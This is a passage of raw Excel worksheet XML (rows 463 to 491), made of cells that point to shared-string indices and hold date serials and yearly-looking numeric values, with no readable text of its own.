        <v>179</v>
      </c>
      <c r="J463" s="95" t="s">
        <v>180</v>
      </c>
      <c r="K463" s="95" t="s">
        <v>575</v>
      </c>
      <c r="L463" t="s">
        <v>77</v>
      </c>
      <c r="M463" s="95" t="s">
        <v>1066</v>
      </c>
      <c r="Q463" s="95" t="s">
        <v>1678</v>
      </c>
      <c r="R463">
        <v>3003</v>
      </c>
      <c r="S463">
        <v>2792</v>
      </c>
      <c r="T463">
        <v>2449</v>
      </c>
      <c r="U463">
        <v>2130</v>
      </c>
      <c r="V463">
        <v>2621</v>
      </c>
      <c r="W463" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="464" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A464" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B464" s="52"/>
      <c r="C464" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D464" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E464" s="95" t="s">
        <v>1679</v>
      </c>
      <c r="F464" s="42">
        <v>100</v>
      </c>
      <c r="G464" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H464" t="s">
        <v>1680</v>
      </c>
      <c r="I464" t="s">
        <v>103</v>
      </c>
      <c r="J464" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K464" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L464" t="s">
        <v>77</v>
      </c>
      <c r="M464" s="95" t="s">
        <v>104</v>
      </c>
      <c r="P464" t="s">
        <v>246</v>
      </c>
      <c r="Q464" s="95" t="s">
        <v>247</v>
      </c>
      <c r="W464" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="465" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A465" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B465" s="52"/>
      <c r="C465" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D465" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E465" s="95" t="s">
        <v>1681</v>
      </c>
      <c r="F465" s="42">
        <v>100</v>
      </c>
      <c r="G465" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H465" t="s">
        <v>1682</v>
      </c>
      <c r="I465" t="s">
        <v>185</v>
      </c>
      <c r="J465" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K465" s="95" t="s">
        <v>16</v>
      </c>
      <c r="L465" t="s">
        <v>83</v>
      </c>
      <c r="M465" s="95" t="s">
        <v>72</v>
      </c>
      <c r="P465" t="s">
        <v>677</v>
      </c>
      <c r="Q465" s="95" t="s">
        <v>1683</v>
      </c>
      <c r="W465" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="466" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A466" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B466" s="52"/>
      <c r="C466" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D466" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E466" s="95" t="s">
        <v>1684</v>
      </c>
      <c r="F466" s="42">
        <v>100</v>
      </c>
      <c r="G466" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H466" t="s">
        <v>1685</v>
      </c>
      <c r="I466" t="s">
        <v>103</v>
      </c>
      <c r="J466" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K466" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L466" t="s">
        <v>77</v>
      </c>
      <c r="M466" s="95" t="s">
        <v>104</v>
      </c>
      <c r="P466" t="s">
        <v>246</v>
      </c>
      <c r="Q466" s="95" t="s">
        <v>247</v>
      </c>
      <c r="W466" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="467" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A467" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B467" s="52"/>
      <c r="C467" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D467" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E467" s="95" t="s">
        <v>1686</v>
      </c>
      <c r="F467" s="42">
        <v>100</v>
      </c>
      <c r="G467" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H467" t="s">
        <v>1687</v>
      </c>
      <c r="I467" t="s">
        <v>185</v>
      </c>
      <c r="J467" s="95" t="s">
        <v>542</v>
      </c>
      <c r="K467" s="95" t="s">
        <v>16</v>
      </c>
      <c r="L467" t="s">
        <v>83</v>
      </c>
      <c r="M467" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q467" s="95" t="s">
        <v>1688</v>
      </c>
      <c r="W467" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="468" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A468" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B468" s="52"/>
      <c r="C468" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D468" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E468" s="95" t="s">
        <v>1689</v>
      </c>
      <c r="F468" s="42">
        <v>100</v>
      </c>
      <c r="G468" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H468" t="s">
        <v>1690</v>
      </c>
      <c r="I468" t="s">
        <v>185</v>
      </c>
      <c r="J468" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K468" s="95" t="s">
        <v>16</v>
      </c>
      <c r="L468" t="s">
        <v>83</v>
      </c>
      <c r="M468" s="95" t="s">
        <v>72</v>
      </c>
      <c r="P468" t="s">
        <v>1691</v>
      </c>
      <c r="Q468" s="95" t="s">
        <v>1692</v>
      </c>
      <c r="W468" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="469" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A469" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B469" s="52"/>
      <c r="C469" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D469" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E469" s="95" t="s">
        <v>1693</v>
      </c>
      <c r="F469" s="42">
        <v>100</v>
      </c>
      <c r="G469" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H469" t="s">
        <v>1694</v>
      </c>
      <c r="I469" t="s">
        <v>185</v>
      </c>
      <c r="J469" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K469" s="95" t="s">
        <v>16</v>
      </c>
      <c r="L469" t="s">
        <v>83</v>
      </c>
      <c r="M469" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q469" s="95" t="s">
        <v>1695</v>
      </c>
      <c r="W469" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="470" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A470" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B470" s="52"/>
      <c r="C470" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D470" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E470" s="95" t="s">
        <v>1696</v>
      </c>
      <c r="F470" s="42">
        <v>100</v>
      </c>
      <c r="G470" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H470" t="s">
        <v>1697</v>
      </c>
      <c r="I470" t="s">
        <v>196</v>
      </c>
      <c r="J470" s="95" t="s">
        <v>197</v>
      </c>
      <c r="K470" s="95" t="s">
        <v>18</v>
      </c>
      <c r="L470" t="s">
        <v>77</v>
      </c>
      <c r="M470" s="95" t="s">
        <v>18</v>
      </c>
      <c r="N470" t="s">
        <v>198</v>
      </c>
      <c r="P470" t="s">
        <v>1596</v>
      </c>
      <c r="Q470" s="95" t="s">
        <v>1698</v>
      </c>
      <c r="W470" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="471" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A471" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B471" s="52"/>
      <c r="C471" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D471" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E471" s="95" t="s">
        <v>1699</v>
      </c>
      <c r="F471" s="42">
        <v>100</v>
      </c>
      <c r="G471" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H471" t="s">
        <v>1700</v>
      </c>
      <c r="I471" t="s">
        <v>185</v>
      </c>
      <c r="J471" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K471" s="95" t="s">
        <v>16</v>
      </c>
      <c r="L471" t="s">
        <v>83</v>
      </c>
      <c r="M471" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q471" s="95" t="s">
        <v>1695</v>
      </c>
      <c r="W471" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="472" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A472" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B472" s="52"/>
      <c r="C472" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D472" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E472" s="95" t="s">
        <v>1701</v>
      </c>
      <c r="F472" s="42">
        <v>100</v>
      </c>
      <c r="G472" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H472" t="s">
        <v>1702</v>
      </c>
      <c r="I472" t="s">
        <v>196</v>
      </c>
      <c r="J472" s="95" t="s">
        <v>197</v>
      </c>
      <c r="K472" s="95" t="s">
        <v>18</v>
      </c>
      <c r="L472" t="s">
        <v>77</v>
      </c>
      <c r="M472" s="95" t="s">
        <v>18</v>
      </c>
      <c r="N472" t="s">
        <v>198</v>
      </c>
      <c r="P472" t="s">
        <v>242</v>
      </c>
      <c r="Q472" s="95" t="s">
        <v>1703</v>
      </c>
      <c r="W472" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="473" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A473" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B473" s="52"/>
      <c r="C473" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D473" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E473" s="95" t="s">
        <v>1704</v>
      </c>
      <c r="F473" s="42">
        <v>100</v>
      </c>
      <c r="G473" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H473" t="s">
        <v>1705</v>
      </c>
      <c r="I473" t="s">
        <v>185</v>
      </c>
      <c r="J473" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K473" s="95" t="s">
        <v>16</v>
      </c>
      <c r="L473" t="s">
        <v>83</v>
      </c>
      <c r="M473" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q473" s="95" t="s">
        <v>1706</v>
      </c>
      <c r="W473" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="474" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A474" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B474" s="52"/>
      <c r="C474" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D474" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E474" s="95" t="s">
        <v>1707</v>
      </c>
      <c r="F474" s="42">
        <v>100</v>
      </c>
      <c r="G474" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H474" t="s">
        <v>1708</v>
      </c>
      <c r="I474" t="s">
        <v>185</v>
      </c>
      <c r="J474" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K474" s="95" t="s">
        <v>16</v>
      </c>
      <c r="L474" t="s">
        <v>83</v>
      </c>
      <c r="M474" s="95" t="s">
        <v>72</v>
      </c>
      <c r="P474" t="s">
        <v>1709</v>
      </c>
      <c r="Q474" s="95" t="s">
        <v>1710</v>
      </c>
      <c r="W474" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="475" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A475" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B475" s="52"/>
      <c r="C475" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D475" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E475" s="95" t="s">
        <v>1711</v>
      </c>
      <c r="F475" s="42">
        <v>100</v>
      </c>
      <c r="G475" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H475" t="s">
        <v>1712</v>
      </c>
      <c r="I475" t="s">
        <v>185</v>
      </c>
      <c r="J475" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K475" s="95" t="s">
        <v>16</v>
      </c>
      <c r="L475" t="s">
        <v>83</v>
      </c>
      <c r="M475" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q475" s="95" t="s">
        <v>176</v>
      </c>
      <c r="W475" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="476" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A476" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B476" s="52"/>
      <c r="C476" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D476" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E476" s="95" t="s">
        <v>1713</v>
      </c>
      <c r="F476" s="42">
        <v>100</v>
      </c>
      <c r="G476" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H476" t="s">
        <v>1714</v>
      </c>
      <c r="I476" t="s">
        <v>268</v>
      </c>
      <c r="J476" s="95" t="s">
        <v>566</v>
      </c>
      <c r="K476" s="95" t="s">
        <v>12</v>
      </c>
      <c r="L476" t="s">
        <v>77</v>
      </c>
      <c r="M476" s="95" t="s">
        <v>622</v>
      </c>
      <c r="N476" t="s">
        <v>623</v>
      </c>
      <c r="P476" t="s">
        <v>1715</v>
      </c>
      <c r="Q476" s="95" t="s">
        <v>1716</v>
      </c>
      <c r="W476" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="477" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A477" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B477" s="52">
        <v>44320.612678124999</v>
      </c>
      <c r="C477" s="95" t="s">
        <v>633</v>
      </c>
      <c r="D477" s="96">
        <v>100</v>
      </c>
      <c r="E477" s="95" t="s">
        <v>1717</v>
      </c>
      <c r="F477" s="42">
        <v>100</v>
      </c>
      <c r="G477" s="95" t="s">
        <v>1718</v>
      </c>
      <c r="H477" t="s">
        <v>1719</v>
      </c>
      <c r="I477" t="s">
        <v>179</v>
      </c>
      <c r="J477" s="95" t="s">
        <v>633</v>
      </c>
      <c r="K477" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L477" t="s">
        <v>77</v>
      </c>
      <c r="M477" s="95" t="s">
        <v>633</v>
      </c>
      <c r="N477" t="s">
        <v>634</v>
      </c>
      <c r="Q477" s="95" t="s">
        <v>1720</v>
      </c>
      <c r="R477">
        <v>30249</v>
      </c>
      <c r="S477">
        <v>27627</v>
      </c>
      <c r="T477">
        <v>25490</v>
      </c>
      <c r="U477">
        <v>26293</v>
      </c>
      <c r="V477">
        <v>27255</v>
      </c>
      <c r="W477" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="478" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A478" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B478" s="52">
        <v>44783.685339317133</v>
      </c>
      <c r="C478" s="95" t="s">
        <v>1721</v>
      </c>
      <c r="D478" s="96">
        <v>100</v>
      </c>
      <c r="E478" s="95" t="s">
        <v>1722</v>
      </c>
      <c r="F478" s="42">
        <v>100</v>
      </c>
      <c r="G478" s="95" t="s">
        <v>1723</v>
      </c>
      <c r="H478" t="s">
        <v>1724</v>
      </c>
      <c r="I478" t="s">
        <v>82</v>
      </c>
      <c r="J478" s="95" t="s">
        <v>744</v>
      </c>
      <c r="K478" s="95" t="s">
        <v>24</v>
      </c>
      <c r="L478" t="s">
        <v>83</v>
      </c>
      <c r="M478" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q478" s="95" t="s">
        <v>1725</v>
      </c>
      <c r="W478" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="479" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A479" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B479" s="52">
        <v>44783.73468765046</v>
      </c>
      <c r="C479" s="95" t="s">
        <v>1726</v>
      </c>
      <c r="D479" s="96">
        <v>100</v>
      </c>
      <c r="E479" s="95" t="s">
        <v>1727</v>
      </c>
      <c r="F479" s="42">
        <v>100</v>
      </c>
      <c r="G479" s="95" t="s">
        <v>1728</v>
      </c>
      <c r="H479" t="s">
        <v>1729</v>
      </c>
      <c r="I479" t="s">
        <v>82</v>
      </c>
      <c r="J479" s="95" t="s">
        <v>744</v>
      </c>
      <c r="K479" s="95" t="s">
        <v>24</v>
      </c>
      <c r="L479" t="s">
        <v>83</v>
      </c>
      <c r="M479" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q479" s="95" t="s">
        <v>1730</v>
      </c>
      <c r="W479" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="480" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A480" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B480" s="52"/>
      <c r="C480" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D480" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E480" s="95" t="s">
        <v>1731</v>
      </c>
      <c r="F480" s="42">
        <v>100</v>
      </c>
      <c r="G480" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H480" t="s">
        <v>1732</v>
      </c>
      <c r="I480" t="s">
        <v>546</v>
      </c>
      <c r="J480" s="95" t="s">
        <v>547</v>
      </c>
      <c r="K480" s="95" t="s">
        <v>20</v>
      </c>
      <c r="L480" t="s">
        <v>83</v>
      </c>
      <c r="M480" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q480" s="95" t="s">
        <v>296</v>
      </c>
      <c r="W480" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="481" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A481" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B481" s="52">
        <v>43971.465269837965</v>
      </c>
      <c r="C481" s="95" t="s">
        <v>1733</v>
      </c>
      <c r="D481" s="96">
        <v>101</v>
      </c>
      <c r="E481" s="95" t="s">
        <v>1734</v>
      </c>
      <c r="F481" s="42">
        <v>101</v>
      </c>
      <c r="G481" s="95" t="s">
        <v>1735</v>
      </c>
      <c r="H481" t="s">
        <v>1736</v>
      </c>
      <c r="I481" t="s">
        <v>31</v>
      </c>
      <c r="J481" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K481" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L481" t="s">
        <v>77</v>
      </c>
      <c r="M481" s="95" t="s">
        <v>262</v>
      </c>
      <c r="N481" t="s">
        <v>263</v>
      </c>
      <c r="Q481" s="95" t="s">
        <v>1737</v>
      </c>
      <c r="W481" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="482" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A482" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B482" s="52">
        <v>44292.098849594906</v>
      </c>
      <c r="C482" s="95" t="s">
        <v>1733</v>
      </c>
      <c r="D482" s="96">
        <v>105</v>
      </c>
      <c r="E482" s="95" t="s">
        <v>1734</v>
      </c>
      <c r="F482" s="42">
        <v>105</v>
      </c>
      <c r="G482" s="95" t="s">
        <v>1735</v>
      </c>
      <c r="H482" t="s">
        <v>1736</v>
      </c>
      <c r="I482" t="s">
        <v>31</v>
      </c>
      <c r="J482" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K482" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L482" t="s">
        <v>77</v>
      </c>
      <c r="M482" s="95" t="s">
        <v>262</v>
      </c>
      <c r="N482" t="s">
        <v>263</v>
      </c>
      <c r="Q482" s="95" t="s">
        <v>1738</v>
      </c>
      <c r="R482">
        <v>21273</v>
      </c>
      <c r="S482">
        <v>20936</v>
      </c>
      <c r="T482">
        <v>16902</v>
      </c>
      <c r="U482">
        <v>17884</v>
      </c>
      <c r="V482">
        <v>22457</v>
      </c>
      <c r="W482" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="483" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A483" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B483" s="52">
        <v>44327.625929131944</v>
      </c>
      <c r="C483" s="95" t="s">
        <v>1739</v>
      </c>
      <c r="D483" s="96">
        <v>110</v>
      </c>
      <c r="E483" s="95" t="s">
        <v>1740</v>
      </c>
      <c r="F483" s="42">
        <v>110</v>
      </c>
      <c r="G483" s="95" t="s">
        <v>1741</v>
      </c>
      <c r="H483" t="s">
        <v>1742</v>
      </c>
      <c r="I483" t="s">
        <v>103</v>
      </c>
      <c r="J483" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K483" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L483" t="s">
        <v>77</v>
      </c>
      <c r="M483" s="95" t="s">
        <v>104</v>
      </c>
      <c r="O483" s="95" t="s">
        <v>1743</v>
      </c>
      <c r="Q483" s="95" t="s">
        <v>1744</v>
      </c>
      <c r="R483">
        <v>672</v>
      </c>
      <c r="S483">
        <v>1</v>
      </c>
      <c r="W483" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="484" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A484" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B484" s="52">
        <v>44369.44911671296</v>
      </c>
      <c r="C484" s="95" t="s">
        <v>1739</v>
      </c>
      <c r="D484" s="96">
        <v>202</v>
      </c>
      <c r="E484" s="95" t="s">
        <v>1745</v>
      </c>
      <c r="F484" s="42">
        <v>101</v>
      </c>
      <c r="G484" s="95" t="s">
        <v>1746</v>
      </c>
      <c r="H484" t="s">
        <v>1747</v>
      </c>
      <c r="I484" t="s">
        <v>75</v>
      </c>
      <c r="J484" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K484" s="95" t="s">
        <v>15</v>
      </c>
      <c r="L484" t="s">
        <v>77</v>
      </c>
      <c r="M484" s="95" t="s">
        <v>90</v>
      </c>
      <c r="N484" t="s">
        <v>167</v>
      </c>
      <c r="O484" s="95" t="s">
        <v>1748</v>
      </c>
      <c r="Q484" s="95" t="s">
        <v>1749</v>
      </c>
      <c r="U484">
        <v>1</v>
      </c>
      <c r="V484">
        <v>2188</v>
      </c>
      <c r="W484" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="485" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A485" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B485" s="52">
        <v>44369.449116643518</v>
      </c>
      <c r="C485" s="95" t="s">
        <v>1739</v>
      </c>
      <c r="D485" s="96">
        <v>202</v>
      </c>
      <c r="E485" s="95" t="s">
        <v>1750</v>
      </c>
      <c r="F485" s="42">
        <v>121</v>
      </c>
      <c r="G485" s="95" t="s">
        <v>1751</v>
      </c>
      <c r="H485" t="s">
        <v>1752</v>
      </c>
      <c r="I485" t="s">
        <v>75</v>
      </c>
      <c r="J485" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K485" s="95" t="s">
        <v>15</v>
      </c>
      <c r="L485" t="s">
        <v>77</v>
      </c>
      <c r="M485" s="95" t="s">
        <v>90</v>
      </c>
      <c r="N485" t="s">
        <v>167</v>
      </c>
      <c r="O485" s="95" t="s">
        <v>1753</v>
      </c>
      <c r="Q485" s="95" t="s">
        <v>1749</v>
      </c>
      <c r="R485">
        <v>146809</v>
      </c>
      <c r="S485">
        <v>167648</v>
      </c>
      <c r="T485">
        <v>151453</v>
      </c>
      <c r="U485">
        <v>166315</v>
      </c>
      <c r="V485">
        <v>247824</v>
      </c>
      <c r="W485" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="486" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A486" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B486" s="52">
        <v>44369.449116689815</v>
      </c>
      <c r="C486" s="95" t="s">
        <v>1739</v>
      </c>
      <c r="D486" s="96">
        <v>202</v>
      </c>
      <c r="E486" s="95" t="s">
        <v>1754</v>
      </c>
      <c r="F486" s="42">
        <v>122</v>
      </c>
      <c r="G486" s="95" t="s">
        <v>1755</v>
      </c>
      <c r="H486" t="s">
        <v>1756</v>
      </c>
      <c r="I486" t="s">
        <v>75</v>
      </c>
      <c r="J486" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K486" s="95" t="s">
        <v>15</v>
      </c>
      <c r="L486" t="s">
        <v>77</v>
      </c>
      <c r="M486" s="95" t="s">
        <v>90</v>
      </c>
      <c r="N486" t="s">
        <v>167</v>
      </c>
      <c r="O486" s="95" t="s">
        <v>1757</v>
      </c>
      <c r="Q486" s="95" t="s">
        <v>1749</v>
      </c>
      <c r="R486">
        <v>131801</v>
      </c>
      <c r="S486">
        <v>139572</v>
      </c>
      <c r="T486">
        <v>239616</v>
      </c>
      <c r="U486">
        <v>708788</v>
      </c>
      <c r="V486">
        <v>727682</v>
      </c>
      <c r="W486" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="487" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A487" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B487" s="52">
        <v>44439.444533761576</v>
      </c>
      <c r="C487" s="95" t="s">
        <v>1758</v>
      </c>
      <c r="D487" s="96">
        <v>101</v>
      </c>
      <c r="E487" s="95" t="s">
        <v>1759</v>
      </c>
      <c r="F487" s="42">
        <v>101</v>
      </c>
      <c r="G487" s="95" t="s">
        <v>1760</v>
      </c>
      <c r="H487" t="s">
        <v>1761</v>
      </c>
      <c r="I487" t="s">
        <v>156</v>
      </c>
      <c r="J487" s="95" t="s">
        <v>301</v>
      </c>
      <c r="K487" s="95" t="s">
        <v>26</v>
      </c>
      <c r="L487" t="s">
        <v>77</v>
      </c>
      <c r="M487" s="95" t="s">
        <v>475</v>
      </c>
      <c r="N487" t="s">
        <v>476</v>
      </c>
      <c r="Q487" s="95" t="s">
        <v>161</v>
      </c>
      <c r="R487">
        <v>2935</v>
      </c>
      <c r="W487" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="488" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A488" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B488" s="52">
        <v>44677.641968946758</v>
      </c>
      <c r="C488" s="95" t="s">
        <v>1762</v>
      </c>
      <c r="D488" s="96">
        <v>100</v>
      </c>
      <c r="E488" s="95" t="s">
        <v>1763</v>
      </c>
      <c r="F488" s="42">
        <v>100</v>
      </c>
      <c r="G488" s="95" t="s">
        <v>1764</v>
      </c>
      <c r="H488" t="s">
        <v>1765</v>
      </c>
      <c r="I488" t="s">
        <v>268</v>
      </c>
      <c r="J488" s="95" t="s">
        <v>566</v>
      </c>
      <c r="K488" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L488" t="s">
        <v>77</v>
      </c>
      <c r="M488" s="95" t="s">
        <v>1766</v>
      </c>
      <c r="N488" t="s">
        <v>1767</v>
      </c>
      <c r="Q488" s="95" t="s">
        <v>1768</v>
      </c>
      <c r="T488">
        <v>12</v>
      </c>
      <c r="W488" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="489" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A489" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B489" s="52">
        <v>44434.519642870371</v>
      </c>
      <c r="C489" s="95" t="s">
        <v>1769</v>
      </c>
      <c r="D489" s="96">
        <v>150</v>
      </c>
      <c r="E489" s="95" t="s">
        <v>1770</v>
      </c>
      <c r="F489" s="42">
        <v>200</v>
      </c>
      <c r="G489" s="95" t="s">
        <v>1771</v>
      </c>
      <c r="H489" t="s">
        <v>1772</v>
      </c>
      <c r="I489" t="s">
        <v>82</v>
      </c>
      <c r="J489" s="95" t="s">
        <v>744</v>
      </c>
      <c r="K489" s="95" t="s">
        <v>24</v>
      </c>
      <c r="L489" t="s">
        <v>83</v>
      </c>
      <c r="M489" s="95" t="s">
        <v>72</v>
      </c>
      <c r="O489" s="95" t="s">
        <v>1773</v>
      </c>
      <c r="Q489" s="95" t="s">
        <v>1774</v>
      </c>
      <c r="S489">
        <v>11149</v>
      </c>
      <c r="T489">
        <v>3530</v>
      </c>
      <c r="U489">
        <v>6367</v>
      </c>
      <c r="V489">
        <v>27550</v>
      </c>
      <c r="W489" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="490" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A490" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B490" s="52">
        <v>43984.924520972221</v>
      </c>
      <c r="C490" s="95" t="s">
        <v>1769</v>
      </c>
      <c r="D490" s="96">
        <v>102</v>
      </c>
      <c r="E490" s="95" t="s">
        <v>1775</v>
      </c>
      <c r="F490" s="42">
        <v>102</v>
      </c>
      <c r="G490" s="95" t="s">
        <v>1776</v>
      </c>
      <c r="H490" t="s">
        <v>1777</v>
      </c>
      <c r="I490" t="s">
        <v>82</v>
      </c>
      <c r="J490" s="95" t="s">
        <v>744</v>
      </c>
      <c r="K490" s="95" t="s">
        <v>24</v>
      </c>
      <c r="L490" t="s">
        <v>83</v>
      </c>
      <c r="M490" s="95" t="s">
        <v>72</v>
      </c>
      <c r="O490" s="95" t="s">
        <v>1778</v>
      </c>
      <c r="P490" t="s">
        <v>745</v>
      </c>
      <c r="Q490" s="95" t="s">
        <v>1779</v>
      </c>
      <c r="R490">
        <v>383</v>
      </c>
      <c r="S490">
        <v>213</v>
      </c>
      <c r="T490">
        <v>1430</v>
      </c>
      <c r="U490">
        <v>2558</v>
      </c>
      <c r="V490">
        <v>3151</v>
      </c>
      <c r="W490" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="491" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A491" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B491" s="52">
        <v>44495.004373414355</v>
      </c>
      <c r="C491" s="95" t="s">
        <v>1769</v>
      </c>
      <c r="D491" s="96">
        <v>150</v>
      </c>
      <c r="E491" s="95" t="s">
        <v>1775</v>
      </c>
      <c r="F491" s="42">
        <v>200</v>
      </c>
      <c r="G491" s="95" t="s">
        <v>1776</v>
      </c>
      <c r="H491" t="s">
        <v>1780</v>
